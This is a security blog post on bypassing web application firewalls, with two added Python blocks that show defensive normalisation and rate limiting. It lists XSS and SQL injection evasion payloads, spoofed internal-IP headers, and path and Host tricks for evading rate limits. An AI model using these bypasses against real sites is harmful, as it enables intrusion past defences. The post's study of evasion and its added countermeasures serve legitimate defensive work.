Unique WAF Bypassing Methods…!!!

Akash Venky
4 min read, Mar 9, 2022
WAF (Web Application Firewall)

What is a WAF?

A web application firewall (WAF) is a firewall that monitors, filters, and blocks data packets as they travel to and from a website or web application.

A WAF can be either network-based, host-based, or cloud-based and is often deployed through a reverse proxy and placed in front of one or more websites or applications.

How a WAF actually works

A WAF analyzes Hypertext Transfer Protocol (HTTP) requests and applies a set of rules that define what parts of that conversation are benign and what parts are malicious. The main parts of HTTP conversations that a WAF analyzes are GET and POST requests. GET requests are used to retrieve data from the server, and POST requests are used to send data to a server to change its state.

The typical operating modes of a WAF

Whitelisting, blacklisting, or hybrid security, which uses both of the above as rules.

WAF vendors:

AWS, Cloudflare, Akamai, Imperva, Verizon [EdgeCast], Sucuri and many more

Typical response signatures, by WAF:

AWS-WAF: awselb/2.0, AWSALB cookie values, and sometimes custom responses

CloudFront: Generated by CloudFront (CloudFront)

Cloudflare: CLOUDFLARE_ERROR_500S_BOX

Akamai: AkamaiGHost

Imperva: Powered By Incapsula

Sucuri: Sucuri, X-Sucuri-ID, Access Denied — Sucuri Website Firewall

Verizon[EdgeCast]: Please contact the site administrator, and provide the following Reference ID: EdgeCast Web Application Firewall (Verizon)

F5 ASM: The requested URL was rejected.

ModSecurity: This error was generated by Mod_Security

NetScaler: NS-Cache

Nexusguard: speresources.nexusguard.com/wafpage/index.html

Palo Alto: Palo Alto Next-Generation Security Platform text snippet.

SonicWall: This request is blocked by the SonicWALL.

Sophos: Powered by UTM Web Protection

ZenEdge: X-Zen-Fury header.

A few facts about WAFs

WAFs use common ports such as 80, 443, 8008, 8080 and 8088.

WAFs create their own cookies during a session.

WAFs reveal their presence in the response headers.

WAFs do not give complete control over DoS and DDoS attacks.

WAFs can respond with unique response codes and descriptive errors.

WAFs are easily identifiable with simple tools such as traceroute, Nmap, curl, response headers and banners.

Unique methods to bypass WAF security

When you are on a login page.

Blocked Reason:

The WAF blocks you as an intruder [account lockout, brute forcing].

/v1/auth/login

Bypassing method:

Use random user-agents, ranging from Chrome desktop to phone browsers.

Use proxy chains, since there is a real chance that your IP gets blocked.

Use slight changes in the API path, such as /v2/auth/login

Try case variations in the path, such as /V1/auth/login

While checking for SQL injection:

Blocked reason:

union select user, password from users

Bypassing methods:

|| (select user from users where user_id = 1) = 'admin'

While working on XSS:

Blocked reason:

<script>alert(1)</script>

SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

Bypassing method:

<ScRipT>alert()</sCRipT>

sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

While working on URL encoding:

Encode normal payloads with percent (URL) encoding.

Blocked Reason:

1. <svG/x=">"/oNloaD=confirm()//

2. uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)

Bypassing Method:

1. %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

2. uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

While checking with comments:

Comments obfuscate standard payload vectors.

Blocked Reason:

1. <script>alert()</script>

2. /?id=1+union+select+1,2,3 --

3. <a href=javascript:alert()>ClickMe

Bypassing Method:

1. <!--<script>alert/**/()/**/</script>

2. /?id=1+un/**/ion+sel/**/ect+1,2,3 --

3. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
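The case, URL-encoding and comment bypasses above all work for the same reason: a rule matched against the raw request text. This added example (mine, not from the original post or any vendor) shows a hypothetical rule set missing every bypass payload quoted above when applied raw, and catching all of them once the request is normalised first (decode, strip comments, lowercase), which is the mitigation a WAF operator should confirm is in place.

```python
import html
import re
from urllib.parse import unquote

# Constructed test set: the blocked strings and their bypasses quoted in the sections above.
BLOCKED = ["<script>alert(1)</script>", "union select user, password from users"]
BYPASSES = [
    "<ScRipT>alert()</sCRipT>",
    "sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'",
    "%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F",
    "uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29",
    "/?id=1+un/**/ion+sel/**/ect+1,2,3 --",
    "<a aa aaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe",
]
# Hypothetical rule set (not any vendor's); the rules themselves are reasonable,
# the weakness is applying them to the raw, un-normalised request.
SIGNATURES = [r"<script", r"union\W*select", r"select\W*\*\W*from",
              r"onload\s*=", r"javascript:"]

def naive_match(payload: str) -> bool:
    """Case-sensitive matching on the raw string: every bypass above slips past."""
    return any(re.search(p, payload) for p in SIGNATURES)

def normalize(payload: str, rounds: int = 3) -> str:
    """Canonicalise before matching: percent-decode ('+' is a space in query
    strings), decode HTML entities, strip /* */ comments, collapse whitespace
    and the '/' separator used in <svG/x=...>, then lowercase. Several decode
    rounds undo double encoding."""
    s = payload
    for _ in range(rounds):
        s = html.unescape(unquote(s.replace("+", " ")))
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)
    s = re.sub(r"[\s/]+", " ", s)
    return s.lower()

def normalized_match(payload: str) -> bool:
    """The same rules applied to the normalised form catch all six bypasses."""
    return any(re.search(p, normalize(payload)) for p in SIGNATURES)

def evaluate() -> dict:
    """Map each bypass payload to its (naive, normalized) verdict."""
    return {p: (naive_match(p), normalized_match(p)) for p in BYPASSES}

if __name__ == "__main__":
    for payload, (naive, norm) in evaluate().items():
        print(f"naive={naive!s:<5} normalized={norm!s:<5} {payload}")
```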

While working on request header spoofing:

Our target is to fool the WAF/server into believing the request came from their internal network. Adding some spoofed headers that represent the internal network does the trick. With each request, a set of such headers is added, thus spoofing the origin.

The upstream proxy/WAF misinterprets the request as coming from their internal network and lets our gory payload through.

Bypassing Method:

1. X-Originating-IP: 127.0.0.1

2. X-Forwarded-For: 127.0.0.1

3. X-Remote-IP: 127.0.0.1

4. X-Remote-Addr: 127.0.0.1

5. X-Client-IP: 127.0.0.1

While checking for rate limiting:

Blocked reason:

The attacker is able to send 5000 requests within 10 minutes; beyond 5000 requests, further requests should be forbidden [403].

GET/POST/DELETE /v3/admin/add_data/122

Host: example.com

Bypassing methods:

1. GET/POST/DELETE /../../../../../../v3/admin/add_data/122

Host: example.com

2. GET/POST/DELETE /v3/admin/add_data/122/../../../../../../../

Host: example.com

3. GET/POST/DELETE /v3/admin/add_data/122

Host: TAMPERED.example.com

4. GET/POST/DELETE /v3/admin/add_data/122

Host: example.com

X-Forwarded-Host: 127.0.0.1

5. GET/POST/DELETE /v3/admin/add_data/122

Remove all the request headers and send.
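The header-spoofing and rate-limit bypasses above (and the path variants in the login section) succeed when the WAF keys its decision on values the client controls: X-Forwarded-For and friends, the Host header, or the literal request path. This added example (mine, not the post's or any product's code) derives the client address from the TCP peer and a list of trusted proxies, drops the spoofable headers, canonicalises the path, and keys a sliding-window limit on the result; the trusted proxy range and the 5000-per-10-minutes limit are assumed values.

```python
import ipaddress
import posixpath
from collections import defaultdict, deque

# Assumed deployment value: our own reverse proxies, whose X-Forwarded-For hops we trust.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
# The origin-spoofing headers listed above: client-controlled, so never trusted.
SPOOFABLE = {"x-originating-ip", "x-forwarded-for", "x-remote-ip",
             "x-remote-addr", "x-client-ip", "x-forwarded-host"}

def is_trusted(ip: str) -> bool:
    try:
        return any(ipaddress.ip_address(ip) in net for net in TRUSTED_PROXIES)
    except ValueError:  # malformed hop written by the client
        return False

def client_ip(peer_ip: str, headers: dict) -> str:
    """Start from the TCP peer and walk X-Forwarded-For right to left past our own
    proxies only; a client-written 127.0.0.1 lies left of the first untrusted hop."""
    if not is_trusted(peer_ip):
        return peer_ip
    xff = next((v for k, v in headers.items() if k.lower() == "x-forwarded-for"), "")
    for hop in reversed([h.strip() for h in xff.split(",") if h.strip()]):
        if not is_trusted(hop):
            return hop
    return peer_ip

def strip_spoofable(headers: dict) -> dict:
    # Drop the spoofable headers so the backend never sees client-supplied values.
    return {k: v for k, v in headers.items() if k.lower() not in SPOOFABLE}

def canonical_path(path: str) -> str:
    """Resolve dot segments and repeated slashes, e.g. /../../v3/x -> /v3/x."""
    return posixpath.normpath("/" + path.lstrip("/"))

class RateLimiter:
    """Sliding window keyed on (verified client, canonical path); Host and method
    are deliberately not part of the key, so tampering with them changes nothing."""
    def __init__(self, limit: int, window_s: float):
        self.limit, self.window_s = limit, window_s
        self.hits = defaultdict(deque)

    def allow(self, peer_ip: str, path: str, headers: dict, now: float) -> bool:
        key = (client_ip(peer_ip, headers), canonical_path(path))
        q = self.hits[key]
        while q and now - q[0] >= self.window_s:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True
```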

Suggestions are most welcome. Please write to Akash.venky091@gmail.com. You can also follow me here for more updates on security and ethical hacking. Akash Venky

or contact me @ https://www.linkedin.com/in/akash-h-c-4a4090a7/
